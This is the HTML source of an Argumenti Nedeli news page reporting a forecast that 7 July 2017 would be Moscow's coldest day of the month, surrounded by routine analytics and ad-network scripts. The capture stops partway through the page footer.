<!DOCTYPE html>
<html>
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta name='yandex-verification' content='57463a260b82b280' />
	<meta name="google-site-verification" content="tossbk_I2eb3-RB8DxVbAUYPewK5KDyj6bnrnKC8-eU" />
	<meta name="mailru-verification" content="1505d3c11701cb6c" />
	<meta name="dumedia-verify" content="df31ef70be34">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
	<meta name="757a66e838ed83d5840779983391e519" content="">
	<title>7 июля станет самым холодным днем месяца - Аргументы Недели</title><meta name="description" content="Пятница, 7 июля, в Москве обещает стать самым холодным днем текущего месяца, полагают синоптики. Уже сегодняшней ночью температура резко пойдет на спад, достигнув +9°C. 

"><meta name="twitter:title" content="7 июля станет самым холодным днем месяца - Аргументы Недели"><meta name="twitter:image" content="http://argumenti.ru/images/arhnews/541109.jpg"><meta name="og:title" content="7 июля станет самым холодным днем месяца - Аргументы Недели"><meta name="og:description" content="Пятница, 7 июля, в Москве обещает стать самым холодным днем текущего месяца, полагают синоптики. Уже сегодняшней ночью температура резко пойдет на спад, достигнув +9°C. 

"><meta name="og:image" content="http://argumenti.ru/images/arhnews/541109.jpg"><link rel="stylesheet" href="http://argumenti.ru/pub/styles/reset.css" type="text/css"><link rel="stylesheet" href="http://argumenti.ru/pub/styles/mainv.css?ver=33" type="text/css"><link rel="stylesheet" href="http://argumenti.ru/mistakes/static/mistakes.css" type="text/css"><link rel="image_src" href="http://argumenti.ru/images/arhnews/541109.jpg" >	<//base href="http://argumenti.ru/" />
		<link rel="amphtml" href="http://argumenti.ru/meteo/2017/07/541109/amp">
			    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">

	<link title="argumenti_ru" type="application/rss+xml" rel="alternate" href="http://www.argumenti.ru/rss/argumenti_online.xml"/>
	<link rel="icon" type="image/png" href="http://www.argumenti.ru/favicon.ico" />
	<link rel="apple-touch-icon" href="http://www.argumenti.ru/pub/images/apple-touch-icon-iphone.png" />
	<link rel="apple-touch-icon" sizes="72x72" href="http://www.argumenti.ru/pub/images/apple-touch-icon-ipad.png" />
	<link rel="apple-touch-icon" sizes="114x114" href="http://www.argumenti.ru/pub/images/apple-touch-icon-iphone4.png" />
	<link rel="apple-touch-icon" sizes="144x144" href="http://www.argumenti.ru/pub/images/apple-touch-icon-ipad3.png" />

		



	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/argumenti_21.js?ver=1"></script>
	<script language="JavaScript" src="http://argumenti.ru/mistakes/static/mistakes_2.js"></script>
	<script type="text/javascript" src="http://argumenti.ru/pub/js/jdropdowns/jquery.dropdownPlain.js"></script>
	<script type="text/javascript" src="http://argumentiru.com/pub/js/jscroller-0.4.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/jquery.jcarousel.min.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/jquery.validate.min.js"></script>
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js"></script>
    <script type="text/javascript" src="http://argumenti.ru/pub/js/tinycarusel.js"></script>
<script type="text/javascript" src="http://argumentiru.com/pub/js/adfox.asyn.code.scroll/adfox.asyn.code.ver3.js"></script>
		<script type="text/javascript" src="http://argumentiru.com/pub/js/adfox.asyn.code.scroll/adfox.asyn.code.scroll.js"> </script>
<!-- Put this script tag to the <head> of your page -->
<script type="text/javascript" src="https://vk.com/js/api/share.js?94" charset="windows-1251"></script>
<script id="my-widget-script" async
        src="https://likemore-go.imgsmail.ru/widget.js"
        data-uid="9f8d155b17e468abed8b96495fb48897">
</script>
	</head>

			<body>
	
<!-- create page: 17:07:24 07.06.17 -->

<!-- Yandex.Metrika counter  ONLINE -->
<script type="text/javascript">
(function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter26004090 = new Ya.Metrika({id:26004090,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true});
        } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
        s = d.createElement("script"),
        f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/javascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

    if (w.opera == "[object Opera]") {
        d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
})(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="//mc.yandex.ru/watch/26004090" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!--Desktop--!>
<!-- Rating@Mail.ru counter -->
<script type="text/javascript">
var _tmr = window._tmr || (window._tmr = []);
_tmr.push({id: "2828898", type: "pageView", start: (new Date()).getTime()});
(function (d, w, id) {
  if (d.getElementById(id)) return;
  var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true; ts.id = id;
  ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
  var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
  if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window, "topmailru-code");
</script><noscript><div style="position:absolute;left:-10000px;">
<img src="//top-fwz1.mail.ru/counter?id=2828898;js=na" style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter --><header>
<nav>
<div class="menu_wrapper">
<div class="menuToggle"><i class="fa fa-bars" aria-hidden="true"></i></div>
	<ul id="dropdown" class="dropdown">
	    <li><a href="http://argumenti.ru/">Главная страница</a></li>
		<li class="desc_hidden"><a href="http://argumenti.ru/news">Все новости</a></li>
		<li><a href="http://argumenti.ru/online">АН - Онлайн</a></li>
		<li><a href="http://argumenti.ru/live">АН LIVE</a></li>
		<li><a href="http://argumenti.ru/region/spb">АН - CПб</a></li>
		<li><a href="http://an-crimea.ru/" rel='nofollow'>АН - Крым</a></li>
		<li><a href="http://argumenti.ru/region/ekb">АН - Екб</a></li>
		<li><a href="http://argumenti.ru/udobreniya">Биоклад</a></li>
		<li class="greenbuy mob_hidden"><a href="http://argumenti.ru/an">АН-Подписка</a></li>
	</ul>
	<ul id="dropdown" class="dropdown desc_hidden">
	    <li class="submenu_name">Рубрики</li>
		<li><a href="http://argumenti.ru/politics">Политика</a></li>
		<li><a href="http://argumenti.ru/economics">Экономика</a></li>
		<li><a href="http://argumenti.ru/society">Общество</a></li>
		<li><a href="http://argumenti.ru/world">В мире</a></li>
		<li><a href="http://argumenti.ru/social">Соцпакет</a></li>
		<li><a href="http://argumenti.ru/pravoved">Правовед</a></li>
		<li><a href="http://argumenti.ru/rassledovanie">Расследования</a></li>
		<li><a href="http://argumenti.ru/hitech">Хайтек</a></li>
		<li><a href="http://argumenti.ru/gorodm">Город&nbsp;М</a></li>
		<li><a href="http://argumenti.ru/earth"><nobr>Сад-огород</nobr></a></li>
		<li><a href="http://argumenti.ru/espionage">Шпионаж</a></li>
		<li><a href="http://argumenti.ru/scandal">Скандал</a></li>
		<li><a href="http://argumenti.ru/sport">Спорт</a></li>
		<li><a href="http://argumenti.ru/crime">Криминал</a></li>
		<li><a href="http://argumenti.ru/culture">Культура</a></li>
		<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
		<li><a href="http://argumenti.ru/health">Здоровье</a></li>
		<li><a href="http://argumenti.ru/history">История</a></li>
		<li><a href="http://argumenti.ru/education">Образование</a></li>
		<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
		<li><a href="http://argumenti.ru/army">Армия</a></li>
	</ul>	
</div>
</nav>
<div id="star">
			<ul>
																								<li id="73167">
																<a href="http://argumenti.ru/politics/2017/07/541051?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/946b23d77b0e8d1e50f18c782d66f71d.png" width="70" height="70" alt="Bloomberg: Американские дипломаты опасаются, что Путин переиграет Трампа" />
																					<p>Bloomberg: Американские дипломаты опасаются, что Путин переиграет Трампа</p></a>	
						</li>

																								<li id="73170" >
																								<a href="http://argumenti.ru/politics/2017/07/541083?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/0e83d3a52314cbdf55aeffb56ee83bf5.jpg" width="70" height="70" alt="Глава Крыма заявил о намерении отправить в отставку мэра Ялты и трех министров" />
																<p>Глава Крыма заявил о намерении отправить в отставку мэра Ялты и трех министров</p></a>
								
						</li>
																									<li id="73177">
																<a href="http://argumenti.ru/world/2017/07/541082?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/c942af3089d2e23fcbd72ca40247e609.jpg" width="70" height="70" alt="МИД РФ: террористы устроят постановочные химические атаки в Сирии" />
																					<p>МИД РФ: террористы устроят постановочные химические атаки в Сирии</p></a>	
						</li>

																								<li id="73169" class="end">
																								<a href="http://argumenti.ru/meteo/2017/07/541080?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/1f283dd6e5613054a003c917c84c5df9.jpg" width="70" height="70" alt="Гидрометцентр пугает смерчами и сильными грозами во второй половине лета" />
																<p>Гидрометцентр пугает смерчами и сильными грозами во второй половине лета</p></a>
								
						</li>
												</ul>
		</div></header>
        
<div class="container">
	<div class="content">
		<!-- логотип -->

		<div id="corp">
							<a href="http://argumenti.ru/" id="an_logo"><img alt="Аргументы Недели (argumenti.ru)" src="http://www.argumenti.ru/images/argumenti/AN2.gif"/></a>
					<div id="search_time">

																<a href="http://argumenti.ru/an"><div class="newnum2"></div></a>
								


<div class="ya-site-form ya-site-form_inited_no" onclick="return {'action':'http://argumenti.ru/search','arrow':false,'bg':'transparent','fontsize':12,'fg':'#000000','language':'ru','logo':'rb','publicname':'Yandex Site Search #2186328','suggest':true,'tld':'ru','type':2,'usebigdictionary':true,'searchid':2186328,'webopt':false,'websearch':false,'input_fg':'#000000','input_bg':'#ffffff','input_fontStyle':'normal','input_fontWeight':'normal','input_placeholder':'Поиск...','input_placeholderColor':'#000000','input_borderColor':'#7f9db9'}">
	<form action="http://yandex.ru/sitesearch" method="get" target="_blank">
		<input type="hidden" name="searchid" value="2186328"/>
		<input type="hidden" name="l10n" value="ru"/>
		<input type="hidden" name="reqenc" value=""/>
		<input type="search" name="text" value=""/>
		<input type="submit" value="Найти"/>
	</form></div><style type="text/css">.ya-page_js_yes .ya-site-form_inited_no { display: none; }</style><script type="text/javascript">(function(w,d,c){var s=d.createElement('script'),h=d.getElementsByTagName('script')[0],e=d.documentElement;if((' '+e.className+' ').indexOf(' ya-page_js_yes ')===-1){e.className+=' ya-page_js_yes';}s.type='text/javascript';s.async=true;s.charset='utf-8';s.src=(d.location.protocol==='https:'?'https:':'http:')+'//site.yandex.net/v2.0/js/all.js';h.parentNode.insertBefore(s,h);(w[c]||(w[c]=[])).push(function(){Ya.Site.Form.init()})})(window,document,'yandex_site_callbacks');</script>

	</div>
		<div class="soc_reg">

            <ul id="socnets" style="width:100%">
				<li><a class="vk" target="_blank" href="http://vkontakte.ru/club14409962" rel="nofollow"></a></li>
				<li><a class="tw" target="_blank" href="http://twitter.com/argumenti" rel="nofollow"></a></li>
				<li><a class="fb" target="_blank" href="https://www.facebook.com/argumentinedeli" rel="nofollow"></a></li>
				<li><a class="mt2" target="_blank" href="http://argumenti.mirtesen.ru/" rel="nofollow"></a></li>
				<li><a class="ok" target="_blank" href="http://www.odnoklassniki.ru/argumenti" rel="nofollow"></a></li>
			</ul>


			<div id="parts">
		<select id="Regions" onchange="window.location.href=this.options[this.selectedIndex].value">
			<option value="">Регион</option>
			<option value="http://argumenti.ru/">Вся Россия</option>
								
				<option value="http://argumenti.ru/region/altay">Алтайский край</option>
								
				<option value="http://argumenti.ru/region/baltiya">Балтия</option>
								
				<option value="http://argumenti.ru/region/belrus">Белоруссия</option>
								
				<option value="http://argumenti.ru/region/vladivostok">Владивосток</option>
								
				<option value="http://argumenti.ru/region/volgograd">Волгоград</option>
								
				<option value="http://argumenti.ru/region/vyatka">Вятка</option>
								
				<option value="http://argumenti.ru/region/ekb">Екатеринбург</option>
								
				<option value="http://argumenti.ru/region/irkutsk">Иркутск</option>
								
				<option value="http://argumenti.ru/region/kamchatka">Камчатка</option>
								
				<option value="http://argumenti.ru/region/krasnoyarsk">Красноярск</option>
								
				<option value="http://an-crimea.ru/">Крым</option>
								
				<option value="http://argumenti.ru/region/kursk">Курск</option>
								
				<option value="http://argumenti.kg/">Кыргызстан</option>
								
				<option value="http://argumenti.ru/region/lipetsk">Липецк</option>
								
				<option value="http://argumenti.ru/region/murmansk">Мурманск</option>
								
				<option value="http://argumenti.ru/region/novosib">Новосибирск</option>
								
				<option value="http://argumenti.ru/region/orel">Орел</option>
								
				<option value="http://argumenti.ru/region/penza">Пенза</option>
								
				<option value="http://argumenti.ru/region/perm">Пермь</option>
								
				<option value="http://argumenti.ru/region/petrozavodsk">Петрозаводск</option>
								
				<option value="http://argumenti.ru/region/petropavlovsk">Петропавловск-К</option>
								
				<option value="http://argumenti.ru/region/spb">Санкт-Петербург</option>
								
				<option value="http://argumenti.ru/region/sakhlin">Сахалин</option>
								
				<option value="http://argumenti.ru/region/kavkaz">Северный Кавказ</option>
								
				<option value="http://argumenti.ru/region/tatarstan">Татарстан</option>
								
				<option value="http://argumenti.ru/region/tver">Тверь</option>
								
				<option value="http://argumenti.ru/region/ural">Урал</option>
								
				<option value="http://argumenti.ru/region/chelyabinsk">Челябинск</option>
								
				<option value="http://argumenti.ru/region/yakutsk">Якутск</option>
								
				<option value="http://argumenti.ru/region/yaroslavl">Ярославль</option>
				
		</select>
	</div>        </div>

		</div>

		<div class="new_corp">
								<div id="menus">
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/politics">Политика</a></li>
			<li><a href="http://argumenti.ru/economics">Экономика</a></li>
			<li><a href="http://argumenti.ru/society">Общество</a></li>
			<li><a href="http://argumenti.ru/world">В мире</a></li>
			<li><a href="http://argumenti.ru/social">Соцпакет</a></li>
			<li><a href="http://argumenti.ru/pravoved">Правовед</a></li>
			<li><a href="http://argumenti.ru/rassledovanie">Расследования</a></li>
			<li><a href="http://argumenti.ru/gorodm">Город&nbsp;М</a></li>
			<li><a href="http://argumenti.ru/earth"><nobr>Сад-огород</nobr></a></li>
			<li><a href="http://argumenti.ru/espionage">Шпионаж</a></li>
			<li><a href="http://argumenti.ru/scandal">Скандал</a></li>
			<li><a style="color:red;"  href="http://argumenti.ru/sport">Спорт</a></li>
		</ul>
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/crime">Криминал</a></li>
			<li><a href="http://argumenti.ru/culture">Культура</a></li>
			<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
			<li><a href="http://argumenti.ru/health">Здоровье</a></li>
			<li><a href="http://argumenti.ru/history">История</a></li>
			<li><a href="http://argumenti.ru/education">Образование</a></li>
			<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
			<li><a href="http://argumenti.ru/army">Армия</a></li>
			<li><a href="http://argumenti.ru/na">Нацакцент</a></li>
			<li><a href="http://argumenti.ru/novoe_pokolenie">Новое поколение</a></li>
			<li><a href="http://argumenti.ru/hitech">Хайтек</a></li>
			<li><a style="color:red;" href="http://argumenti.ru/charity">Сможем вместе</a></li>
		</ul>
</div>
		<!-- Rating@Mail.ru counter -->
<script type="text/javascript">//<![CDATA[
var _tmr = _tmr || [];
_tmr.push({id: "1069168", type: "pageView", start: (new Date()).getTime()});
(function (d, w) {
   var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true;
   ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
   var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
   if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window);
//]]></script><noscript><div style="position:absolute;left:-10000px;">
<img src="//top-fwz1.mail.ru/counter?id=1069168;js=na" style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter -->

		</div>


			<div id="left">

		
		
			<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(50615, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "vertical",
            border_type: "block",
            limit: 4,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            header_bg_color: "FEEAC7",
            bg_color: "EEEEEE",
            border_color: "FBE5C0",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            sitelinks_color: "0000CC",
            favicon: true,
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script>

		<div id="titules" style="margin-bottom: 4px;">
		<!--<a href="http://argumenti.ru/numbers/number/568">-->
		
	<a href="http://argumenti.ru/an">
		<IMG c::$content['endnumber'] src="http://argumenti.ru/images/number/597/706b64b250f938452f3944d8ddbd1387.jpg" alt="Аргументы Недели №568" />
	</a>


		
	</div>

	<!-- подменю -->
	<ul id="corpmenu">
		<!--<li><a href="http://argumenti.ru/numbers/number/568">Купить номер<span class="my_count_number">№26&nbsp;(568)</span></a></li>-->
		<!--  №26&nbsp;(568)?> -->
		<li style="background-color:#2E8B57;"><a style="color:#FFF;" href="http://argumenti.ru/an">Скачать «Аргументы Недели»</a></li>
		<li><a style="color: red; font-size: 0.9em;" href="http://argumenti.ru/udobreniya" rel="nofollow">Проект АН: Биоклад</a></li>
		<li><a href="http://argumenti.ru/novoe_pokolenie">Новое поколение</a></li>
		<!--<li><a href="http://argumenti.ru/numbers">Архив номеров c 2006-2012</a></li>-->
		<li><a href="http://argumenti.ru/live"><span class="live3" style="font-size:110%;">Live</span> - архив</a></li>
		<li><a href="http://argumenti.ru/culture/books/2016/10/469573">Подари детям книгу</a></li>
		<!--<li><a href="http://argumenti.ru/presscenter">Пресс-центр «АН»</a></li>-->
		<li class="live3"><a style="color:white;" href="http://argumenti.ru/allbooks">Электронные книги АН</a></li>
		<li><a style="color: red;" href="http://knigi-an.ru" target="_blank" rel="nofollow">Книги «АН»</a></li>
		<li><a href="http://www.argumenti.ru/reklama/internet.html">Реклама</a></li>
		<li><a href="http://argumenti.ru/subscript">Подписка</a></li>
	
	</ul>


	<script language="JavaScript" type="text/javascript">
		function NewRegion() {
			region_url = $('#Regions option:selected').val();
			if (region_url !='')
				window.location = region_url;
		}
	</script>		


<!-- Крупные preview -->
<!-- По умолчанию -->
		<noindex>
	<h2 class="namerub"><span class="rem">//</span>НАШИ ПАРТНЕРЫ</h2>
	<!-- ex_adv 3 --><a href="" alt="" target="_blank" rel="nofollow"><img src="http://www.argumenti.ru/images/partners/524.gif" width="240" height="100"></a>	<h2 class="namerub"><span class="rem">//</span>Новости</h2>
<div id="smi2adblock_76450"><a href="http://net.finam.ru/" rel="nofollow">Новости net.finam.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.net.finam.ru/data/js/76450.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>

<h2 class="namerub"><span class="rem">//</span>События/Афиша</h2>
<a href="http://m-g-t.ru/performance/sirano-de-berzherak" rel="nofollow">
<img src="http://argumenti.ru/pub/images/partners/691.gif" width="240" height="240" alt="sirano-de-berzherak"  border="0" /></a>



<!-- BEGIN AdMelon http://argumenti.ru (240x400) -->
<script type="text/javascript">
(function() {
    var placeId = 2207, frameId = '_adm_' + placeId + '_iframe', src = document.location.protocol + '//engine.admelon.ru/c?pid=' + placeId + '&rid=' + Math.floor(Math.random() * 1000000000);
    document.write('<div id="_adm_' + placeId + '_div"></div>');
    document.write('<div style="visibility:hidden;position:absolute;"><iframe id="'+ frameId + '" width="1" height="1" marginwidth="0" marginheight="0" scrolling="no" style="border:0;"></iframe></div>');
    var tryCount=0,fn=function(){var a;if(10>tryCount){try{document.all&&!/opera/i.test(navigator.userAgent)?a=window.frames[frameId].document:document.getElementById&&(a=document.getElementById(frameId).contentDocument)}catch(b){}a?a.write(unescape('%3Cscript src="'+src+'" type="text/javascript"%3E%3C/script%3E')):(tryCount++,setTimeout(fn,100))}};fn();})();
</script>
<!-- END AdMelon -->	
	</noindex>
			
	
					<h4 class="namerub"><span class="rem">//</span>Сад и огород</h4>
		<ul class="minf_anons">
							<li><a href="http://argumenti.ru/ad_informer/click/71442" target="_blank"><img src="http://argumenti.ru/images/preview/tabloid/b507e17e2ea914d0e5f3374bcea75a13.jpg" width="70" height="70" alt="Биоклад"  border="0" /><div class="inf_txt">Агротехника фасоли и бобов</div></a></li>	
							<li><a href="http://argumenti.ru/ad_informer/click/68946" target="_blank"><img src="http://argumenti.ru/images/preview/tabloid/41be9494515abc45b9a4829cf417a55c.png" width="70" height="70" alt="Биоклад"  border="0" /><div class="inf_txt">Биоклад лёгок и удобен в применении на вашем дачном участке</div></a></li>	
					</ul>
	
	
		
		
	
<h2 class="namerub"><span class="rem">//</span>Новости MarketGid</h2>
<!-- MarketGidComposite Start -->
<div id="MarketGidScriptRootC39254">
<div id="MarketGidPreloadC39254">
<a id="mg_add39254" href="http://usr.marketgid.com/demo/goods/" target="_blank" rel="nofollow">Добавить свое объявление</a><br> <a href="http://marketgid.com/" target="_blank" rel="nofollow">Загрузка...</a> 
</div>
<script> 
(function(){
var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootC39254")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><body></body></ht"+"ml>");iw.close();var c=iw[b];}
catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootC39254");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=39254;c[ac](dv);
var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="http://jsc.dt00.net/n/e/news.argumenti.ru.39254.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
</script>
</div>
<!-- MarketGidComposite End -->






<h2 class="namerub"><span class="rem">//</span>новости 24СМИ</h2>
<div id="smi_teaser_2695">
    <center><a href="http://ex.24smi.org" rel="nofollow">новости</a></center>
    </div>

<script type="text/JavaScript" encoding="utf8">
        (function() {
        var sm = document.createElement("script");
        sm.type = "text/javascript";
        sm.async = true;
        sm.src = "http://jsn.24smi.org/d/b/2695.js";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(sm, s);})();
    </script>




<div id="smi2adblock_81550"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//js.advert.mirtesen.ru/data/js/81550.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>




	<div>
	

			

<h2 class="namerub"><span class="rem">//</span>Новости news.net.finam.ru</h2>
<div id="smi2adblock_68993"><a href="http://finance.comon.ru/" rel="nofollow">Новости finance.comon.ru</a></div>
<script async type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.finance.comon.ru/data/js/68993.js'; sc.charset = 'windows-1251';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>







	</div>

		
	<h4 class="namerub"><span class="rem">//</span>Поп-новости</h4>
<ul class="main_inf_anons">
			<li>
							<a href="http://argumenti.ru/showbiz/2017/07/541125">
					<img src="http://argumenti.ru/images/preview/arhnews/ad1ba9c01f947dd766643d5e939910dc.jpg" alt="Шнуров и Киркоров поборются за пост президента" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2017/07/541125" style="font-size:1.05em;">Шнуров и Киркоров поборются за пост президента</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2017/07/541122">
					<img src="http://argumenti.ru/images/preview/arhnews/5dcd35e2042cd6e6c9bd3bd624134337.jpg" alt="Паулина Андреева угощает Федора Бондарчука пиццей и газировкой" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2017/07/541122" style="font-size:1.05em;">Паулина Андреева угощает Федора Бондарчука пиццей и газировкой</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2017/07/541105">
					<img src="http://argumenti.ru/images/preview/arhnews/24b42428ebbd4892fb1b723024a4374a.jpg" alt="Джордж Клуни впервые появился с новорожденными детьми на публике" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2017/07/541105" style="font-size:1.05em;">Джордж Клуни впервые появился с новорожденными детьми на публике</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2017/07/541081">
					<img src="http://argumenti.ru/images/preview/arhnews/f40d52ae9a5b77214c257bf30d6dcb61.jpg" alt="Участник &quot;Иванушки International&quot; показал квартиру покойного Олега Яковлева" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2017/07/541081" style="font-size:1.05em;">Участник &quot;Иванушки International&quot; показал квартиру покойного Олега Яковлева</a>
		</li>
	</ul>	<h4 class="namerub"><span class="rem">//</span>Национальный Акцент</h4>
<div id="nazaccent_informer"></div>
<script async type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://media.nazaccent.ru/storage/js/informer.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>



				

		
<!--<h4 class="namerub"><span class="rem">//</span>Наши партнеры</h4>-->


</div>	
		<section id="center">

			<!-- your device: Desktop -->


					<!--noindex-->

	<ul id="topanons">
					<li><span class="news_time">14:30</span><a href="http://argumenti.ru/meteo/2017/07/541109">7 июля станет самым холодным днем месяца</a></li>
					<li><span class="news_time">14:01</span><a href="http://argumenti.ru/meteo/2017/07/541106">Синоптики рассказали о сентябрьской прохладе и 30-градусной жаре этим летом</a></li>
					<li><span class="news_time">11:05</span><a href="http://argumenti.ru/meteo/2017/07/541080">Гидрометцентр пугает смерчами и сильными грозами во второй половине лета</a></li>
					<li><span class="news_time">05.07&nbsp;12:35</span><a href="http://argumenti.ru/meteo/2017/07/540909">МЧС предупредило о надвигающейся грозе с градом</a></li>
					<li><span class="news_time">05.07&nbsp;08:53</span><a href="http://argumenti.ru/meteo/2017/07/540873">Синоптики рассказали, когда наступит &quot;сухое&quot; лето</a></li>
				<li class="news_arh">
							<a href="http://argumenti.ru/meteo/news">Метеоновости</a> /
						<a href="http://argumenti.ru/news" style="font-size:1.2em">все новости</a>

		</li>
	</ul>

	<!--/noindex-->		
			<p class="namerub">
			<span class="rem">//</span><a href="http://argumenti.ru/meteo">Метеоновости</a>
						<span class="agecategory">
									13+
							</span>
		</p>
	
	<article>
	<h1>7 июля станет самым холодным днем месяца</h1>
	
				<p class="info">
					<span class="number_info">

						



													6&nbsp;июля&nbsp;2017,&nbsp;14:30																			[&nbsp;«Аргументы Недели»&nbsp;]
						
					</span>
				</p>
				<div class="publtxt">
																		<figure id="publ_photo">
																<img src="http://argumenti.ru/images/preview/arhnews/7079bf7738a3eaa5a760ec21d32257bd.jpg" alt="7 июля станет самым холодным днем месяца" />
																									<figcaption>globallookpress.com</figcaption>
															</figure>
											

												<div></div>
					
																<div><p><strong>Пятница, 7 июля, в Москве обещает стать самым холодным днем текущего месяца, полагают синоптики. Уже сегодняшней ночью температура резко пойдет на спад, достигнув +9&deg;C.</strong></p>
<p>Днем в пятницу средняя температура в Московском регионе будет доходить всего лишь до 11-12 градусов выше нуля, сообщают &laquo;Метеоновости&raquo;. Холодный ветер лишь усугубит ощущение осенней погоды.</p>
<p>Обычно в это время в Москве хозяйничает настоящее лето, средняя максимальная температура воздуха на станции ВДНХ поднимается до +22,5 градусов, минимальная не опускается ниже +14&deg;C. Так что предстоящая пятница будет на 10 градусов ниже средних показателей. Рекордный холод на 7 июля был зафиксирован в 1952 году, когда среднесуточная температура была на уровне 9,1 &deg;C.</p>
<p>Обнадежить москвичей могут только <a href="http://argumenti.ru/meteo/2017/07/541106">дальнейшие прогнозы на лето</a>.<br /><br /></p></div>
					
					
				</div>
			</article>
				<div id="publ_panel">

					<p class="er_info"><a href="javascript:void(0)" onclick="winop()">Ошибка в тексте? Пожалуйста, выделите ее и нажмите "Ctrl + Enter"</a>
					<span id="clicks" class="clicks"></span>
					

					<!--<script type="text/javascript">
						 $('#clicks').load('ar_clicks/ar_clicks.php?find=541109&date=2017-07-06');
					</script>--></p>

					<div id = "drop_sub">
						<a href="http://www.argumenti.ru/rss/argumenti_online.xml" target="_blank" rel="nofollow">RSS</a>,
